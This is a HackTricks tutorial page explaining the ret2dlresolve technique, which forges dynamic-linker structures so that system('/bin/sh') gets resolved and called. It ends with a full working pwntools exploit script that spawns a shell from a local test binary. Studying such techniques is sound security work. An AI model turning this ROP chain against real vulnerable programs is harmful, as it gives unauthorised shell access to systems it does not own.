Ret2dlresolve

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

As explained in the page about GOT/PLT and Relro, binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function _dl_runtime_resolve.

The _dl_runtime_resolve function takes from the stack references to some structures it needs in order to resolve the specified symbol.

Therefore, it's possible to fake all these structures to make the dynamic linked resolving the requested symbol (like system function) and call it with a configured parameter (e.g. system('/bin/sh')).

Usually, all these structures are faked by making an initial ROP chain that calls read over a writable memory, then the structures and the string '/bin/sh' are passed so they are stored by read in a known location, and then the ROP chain continues by calling _dl_runtime_resolve with the address to $'/bin/sh'.

{% hint style="success" %} This technique is useful specially if there aren't syscall gadgets (to use techniques such as ret2syscall or SROP) and there are't ways to leak libc addresses. {% endhint %}

You can find a better explanation about this technique in the second half of the video:

{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}

Structures

It's necessary to fake 3 structures: JMPREL, STRTAB and SYMTAB. You have a better explanation about how these are built in https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures

Attack Summary

Write fake estructures in some place
Set the first argument of system ($rdi = &'/bin/sh')
Set on the stack the addresses to the structures to call _dl_runtime_resolve
Call _dl_runtime_resolve
system will be resolved and called with '/bin/sh' as argument

Example

You can find an example of this technique here containing a very good explanation of the final ROP chain, but here is the final exploit used:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()

References